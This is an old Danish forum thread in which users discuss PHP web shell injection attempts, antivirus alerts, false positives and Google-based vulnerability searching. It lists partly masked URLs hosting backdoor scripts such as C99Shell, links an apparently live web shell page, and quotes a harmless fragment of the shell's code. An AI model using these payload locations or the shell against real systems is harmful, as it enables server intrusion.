            On Mon, 31 Dec 2007 17:21:33 +0100, "Christian E. Lysel"
 <christian@example.net> wrote:
 >
 >On Mon, 2007-12-31 at 09:44 +0100, Jens G wrote:
 >> >Det er et tekst dokument ... der er intet galt i det, indtil man henter
 >> >det og køre det igennem en php fortolker.
 >> 
 >> Nogle af de andre links indeholdt trojans og backdoors. Kaspersky
 >> skreg ihvertfald godt op da jeg tjekkede.
 >
 >Hvilke?
 Loggen siger:
 detected: Trojan program Backdoor.PHP.Small.o
 URL:  http://randymacXXXXXXX.com/myevent/var/echo
detected: Trojan program Backdoor.PHP.C99Shell.d
 URL:  http://fr3dcv1.100freeXXXXXXX.com/shell.txt????????
Dem som så har lyst til at se på det, må fjerne X'erne.
 Jeg afprøvede ikke alle links. Syntes ikke der var grund til at løbe
 risiko.
 >
 >> Jeg tror de har en base over MX systemer, og så prøver de bare om der
 >> er filer de ved kan være sårbare. 
 >
 >Det tror jeg ikke, det er nemmere blot at bruge google.
 >
 Måske. Jeg ved det ikke.
 -- 
 Jens G
 Kan anbefale  http://www.everlove.dk til IP telefoni.
 Besøg  http://voip-user.dk for debat om ip-telefoni og udstyr.
            
              |   |   
            
        
 
            
         
           Christian E. Lysel (31-12-2007) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  31-12-07 20:38 |  
  |   
            
On Mon, 2007-12-31 at 17:36 +0100, Jens G wrote:
 > URL:  http://randymacXXXXXXX.com/myevent/var/echo
Den er pillet ned
 > detected: Trojan program Backdoor.PHP.C99Shell.d
 > URL:  http://fr3dcv1.100freeXXXXXXX.com/shell.txt????????
<?php
 /*
 ******************************************************************************************************
 *
 *   
  .... En bunke russiske kommentar.
 //Starting calls
 if (!function_exists("getmicrotime")) {function getmicrotime()
 {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec +
 (float)$sec);}}
 error_reporting(5);
  .... Og så starter PHP koden.
 Det er kun "farligt" hvis man gemme filen på sin maskine, og lader PHP
 køre scriptet.
 Hvis din maskine udførte angrebet ville angriberen få en side som
 http://www.easy-play.eu/c99.php
Hvilket reelt giver angriberen et meget nemt grafisk værktøj til at
 angribe din maskine med.
 > Jeg afprøvede ikke alle links. Syntes ikke der var grund til at løbe
 > risiko.
 Hvilken risiko?
 > >> Jeg tror de har en base over MX systemer, og så prøver de bare om der
 > >> er filer de ved kan være sårbare. 
 > >
 > >Det tror jeg ikke, det er nemmere blot at bruge google.
 > >
 > MÃ¥ske. Jeg ved det ikke.
 Andre eksempler på at google kan bruges til at søge efter sårbarheder:
   http://johnny.ihackstuff.com/ghdb.php
            
             |   |   
            
        
 
            
         
           Jens G (01-01-2008) 
         
	
            | Kommentar Fra : Jens G | 
  Dato :  01-01-08 11:23 |  
  |  
 
            On Mon, 31 Dec 2007 20:37:47 +0100, "Christian E. Lysel"
 <christian@example.net> wrote:
 >
 >> Jeg afprøvede ikke alle links. Syntes ikke der var grund til at løbe
 >> risiko.
 >
 >Hvilken risiko?
 Når antivirus kommer og siger der er noget skidt, så tror jeg da på
 det.
 Og så forestiller jeg mig at der også kan være skidt som ikke er i mit
 antivirusprograms base endnu.
 >
 >> >> Jeg tror de har en base over MX systemer, og så prøver de bare om der
 >> >> er filer de ved kan være sårbare. 
 >> >
 >> >Det tror jeg ikke, det er nemmere blot at bruge google.
 >> >
 >> Måske. Jeg ved det ikke.
 >
 >Andre eksempler på at google kan bruges til at søge efter sårbarheder:
 >
 >   http://johnny.ihackstuff.com/ghdb.php
En ret god samling af sårbarheder, må man sige.
 -- 
 Jens G
 Kan anbefale  http://www.everlove.dk til IP telefoni.
 Besøg  http://voip-user.dk for debat om ip-telefoni og udstyr.
            
              |   |   
            
        
 
            
         
           Christian E. Lysel (01-01-2008) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  01-01-08 13:24 |  
  |   
            
On Tue, 2008-01-01 at 11:22 +0100, Jens G wrote:
 > >Hvilken risiko?
 > 
 > Når antivirus kommer og siger der er noget skidt, så tror jeg da på
 > det.
 Hvad fortæller den?
 > Og så forestiller jeg mig at der også kan være skidt som ikke er i mit
 > antivirusprograms base endnu.
 Antivirus har også falske positiver.
 Tør du besøge  http://www.eicar.org/download/eicar.com ?
 > >> >Det tror jeg ikke, det er nemmere blot at bruge google.
 > >> >
 > >> MÃ¥ske. Jeg ved det ikke.
 > >
 > >Andre eksempler på at google kan bruges til at søge efter sårbarheder:
 > >
 > >   http://johnny.ihackstuff.com/ghdb.php
> 
 > En ret god samling af sårbarheder, må man sige.
 Er det ikke "dejligt" nemt?
            
              |   |   
            
        
 
            
         
           Jens G (01-01-2008) 
         
	
            | Kommentar Fra : Jens G | 
  Dato :  01-01-08 14:00 |  
  |  
 
            On Tue, 01 Jan 2008 13:24:09 +0100, "Christian E. Lysel"
 <christian@example.net> wrote:
 >
 >On Tue, 2008-01-01 at 11:22 +0100, Jens G wrote:
 >> >Hvilken risiko?
 >> 
 >> Når antivirus kommer og siger der er noget skidt, så tror jeg da på
 >> det.
 >
 >Hvad fortæller den?
 F.eks. detected: Trojan program Backdoor.PHP.C99Shell.d
 Det er muligt den skal eksekveres af php, men jeg ved det ikke.
 >
 >> Og så forestiller jeg mig at der også kan være skidt som ikke er i mit
 >> antivirusprograms base endnu.
 >
 >Antivirus har også falske positiver.
 >
 >Tør du besøge  http://www.eicar.org/download/eicar.com ?
 Jada. Lige præcist den tør jeg godt besøge. 
 >
 >> >> >Det tror jeg ikke, det er nemmere blot at bruge google.
 >> >> >
 >> >> Måske. Jeg ved det ikke.
 >> >
 >> >Andre eksempler på at google kan bruges til at søge efter sårbarheder:
 >> >
 >> >   http://johnny.ihackstuff.com/ghdb.php
>> 
 >> En ret god samling af sårbarheder, må man sige.
 >
 >Er det ikke "dejligt" nemt?
 >
 Alt for nemt.
 -- 
 Jens G
 Kan anbefale  http://www.everlove.dk til IP telefoni.
 Besøg  http://voip-user.dk for debat om ip-telefoni og udstyr.
            
              |   |   
            
        
 
            
         
           Christian E. Lysel (01-01-2008) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  01-01-08 13:44 |  
  |   |   |   
            
        
 
            
         
           Christian E. Lysel (01-01-2008) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  01-01-08 16:05 |  
  |   |   |   
            
        
 
            
         
           Christian E. Lysel (01-01-2008) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  01-01-08 18:31 |  
  |   
            
On Tue, 2008-01-01 at 16:45 +0100, Kim Ludvigsen wrote:
 > Jo, men den giver trods alt over 300 millioner sider, og selv hvis man 
 > begrænser til danske sider, hvilket en international hacker vel ikke har 
 > nogen speciel grund til, får man knap 600.000 sider. Men ok, de kan jo 
 > bare starte fra en ende af.
 http://da.wikipedia.org/wiki/Muhammed-tegningerne ?
 > > Et fint eksempel på hvad google kan bruges til kan du se på
 > >  http://johnny.ihackstuff.com/ghdb.php
> 
 > Var der for øvrigt ikke noget om at Google for nogle år siden 
 > stoppede/forsøgte at stoppe søgning efter visse sårbarheder?
 Der var en sag, hvor google ikke måtte linke til noget sites. I stedet
 linkede de til dommerkendelsen hvor linkene stod.
            
              |   |   
            
        
 
    
 
					
					 
			 | 
			
				
        
			 |